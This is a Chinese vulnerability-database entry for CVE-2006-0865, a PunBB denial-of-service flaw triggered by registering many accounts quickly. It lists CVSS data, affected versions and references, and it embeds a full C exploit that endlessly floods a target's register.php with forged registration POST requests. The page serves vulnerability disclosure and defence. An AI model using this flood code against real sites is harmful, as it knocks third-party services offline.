CVE-2006-0865
CVSS5.0
发布时间 :2006-02-23 18:02:00
修订时间 :2008-09-05 17:00:25
NMCOE    

[原文]PunBB 1.2.10 and earlier allows remote attackers to cause a denial of service (resource consumption) by registering many user accounts quickly.


[CNNVD]PunBB 注册大量用户帐号拒绝服务漏洞(CNNVD-200602-349)

        PunBB 1.2.10及之前版本可使远程攻击者通过快速注册大量用户帐号来造成拒绝服务(资源占用率过高)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:punbb:punbb:1.2.7
cpe:/a:punbb:punbb:1.1.3
cpe:/a:punbb:punbb:1.1.2
cpe:/a:punbb:punbb:1.2.9
cpe:/a:punbb:punbb:1.0_rc2
cpe:/a:punbb:punbb:1.0_rc1
cpe:/a:punbb:punbb:1.2.5
cpe:/a:punbb:punbb:1.2.8
cpe:/a:punbb:punbb:1.2.2
cpe:/a:punbb:punbb:1.0_beta1a
cpe:/a:punbb:punbb:1.2.10
cpe:/a:punbb:punbb:1.2.4
cpe:/a:punbb:punbb:1.0
cpe:/a:punbb:punbb:1.1.1
cpe:/a:punbb:punbb:1.1.4
cpe:/a:punbb:punbb:1.0.1
cpe:/a:punbb:punbb:1.1.5
cpe:/a:punbb:punbb:1.2.3
cpe:/a:punbb:punbb:1.0_beta2
cpe:/a:punbb:punbb:1.2.6
cpe:/a:punbb:punbb:1.0_beta1
cpe:/a:punbb:punbb:1.0_alpha
cpe:/a:punbb:punbb:1.2
cpe:/a:punbb:punbb:1.2.1
cpe:/a:punbb:punbb:1.0_beta3
cpe:/a:punbb:punbb:1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0865
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0865
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-349
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/425630/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060219 PunBB 1.2.10 Multiple DoS Vulnerabilities
http://www.neosecurityteam.net/advisories/Advisory-15.txt
(UNKNOWN)  MISC  http://www.neosecurityteam.net/advisories/Advisory-15.txt
http://xforce.iss.net/xforce/xfdb/24837
(UNKNOWN)  XF  punbb-register-ip-dos(24837)

- 漏洞信息

PunBB 注册大量用户帐号拒绝服务漏洞
中危 未知
2006-02-23 00:00:00 2006-02-27 00:00:00
远程  
        PunBB 1.2.10及之前版本可使远程攻击者通过快速注册大量用户帐号来造成拒绝服务(资源占用率过高)。

- 公告与补丁

        

- 漏洞信息 (1517)

PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit (EDBID:1517)
php webapps
2006-02-20 Verified
0 K4P0
N/A [点击下载]
/*
  Name: NST-Exploit Punbb 2.0.10 Denial Of Service
  Copyright: NeoSecurity
  Author: K4P0
    
  [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
  
  #################################################
  PunBB 2.0.10 Denial of Service exploit by K4P0  
  Use only at your own reputation risk! ;)        

  www.NeoSecurityTeam.net                         
  #################################################

  [1] - Trying if connection is possible...
  [2] - Connected!
  [3] - Flooding localhost...
  
  Use it at your own risk!.
*/

#define WINDOWS
//#define LINUX

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif

#define NST_ALIVE 1

int  Connect(char*);
void SendPack(int, int, char*, char*); 
void _perror(char*);
void HowTo(char*);

int main(int argc, char* argv[])
{
  int vict_sock, dos = 0;
  puts("#################################################");
  puts(" PunBB 2.0.10 Denial of Service exploit by K4P0  ");
  puts(" Use only at your own reputation risk! ;)        \n");
  puts(" www.NeoSecurityTeam.net                         ");
  if(argc < 4) HowTo(argv[0]);
  puts("#################################################\n");

  printf("[1] - Trying if connection is possible...\n", argv[1]);
  fflush(stdout);
  vict_sock = Connect(argv[2]);
  printf("[2] - Connected!\n");
  printf("[3] - Flooding %s", argv[1]);
  #ifdef WINDOWS
  closesocket(vict_sock);
  #else
  close(vict_sock);
  #endif
  
  while(NST_ALIVE)
  {
                         if(!(dos % 10)) fprintf(stderr, ".");
                         vict_sock = Connect(argv[2]);
                         SendPack(vict_sock, dos, argv[3], argv[1]);
                         dos++;
                         #ifdef WINDOWS
                         closesocket(vict_sock);
                         WSACleanup();
                         #else
                         close(vict_sock);
                         #endif
  }
  return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
int Connect(char* IP)
{
    struct sockaddr_in *_addr;
    int vict_sck;
    
    #ifdef WINDOWS
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    {
                              //WSAGetLastError()? Nah...
                              fprintf(stderr, "[*]   WSAStartup() failed");
                              exit(-1);
    }
    #endif
    
    if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
    {
                     fprintf(stderr, "[*]   Unable to reserve memory");
                     exit(-1);
    }
      
    memset(_addr, 0x0, sizeof(struct sockaddr_in));
    _addr->sin_family = AF_INET;
    _addr->sin_port   = htons(80);
    _addr->sin_addr.s_addr = inet_addr(IP);
    
    #ifdef WINDOWS
    if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
    {
                 fprintf(stderr, "WSASocket() failed");
                 exit(-1);
    }
    else
    if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) 
                 _perror("socket() ");
    #endif
    
    if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
                 _perror("connect() "); 
    
    free(_addr);
    return vict_sck; 
}

void SendPack(int v_sck, int var, char* path, char* DNS)
{
     char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
     if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) ||
        !(HTTP_POST = (char *)malloc(512)))
     {
                    fprintf(stderr, "Error trying to reserver memory");
                    exit(-1);
     }
     sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
                        "Host: %s\n"
                        "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
                        "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
                        "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
                        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
                        "Keep-Alive: 300\n"
                        "Proxy-Connection: keep-alive\n"
                        "Referer: http://%s%sregister.php\n"
                        "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);
                                                                            
     sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
                        "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);
     
     sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));
        
     strcat(HTTP_PACK, HTTP_MPCK);
     strcat(HTTP_PACK, HTTP_POST);
     send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
     
     free(HTTP_PACK);
     free(HTTP_MPCK);
     free(HTTP_POST);
     return;
}

void _perror(char* msg)
{
     perror(msg);
     fflush(stdout);
     exit(-1);
}

void HowTo(char* program)
{
     fprintf(stderr, "%s <DNS> <IP> <Path>\n", program);
     fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n");
     fprintf(stderr, "#################################################");
     exit(0);
}

// milw0rm.com [2006-02-20]
		

- 漏洞信息

28162
PunBB User Account Registration Saturation DoS
Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-02-19 Unknow
2006-02-19 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站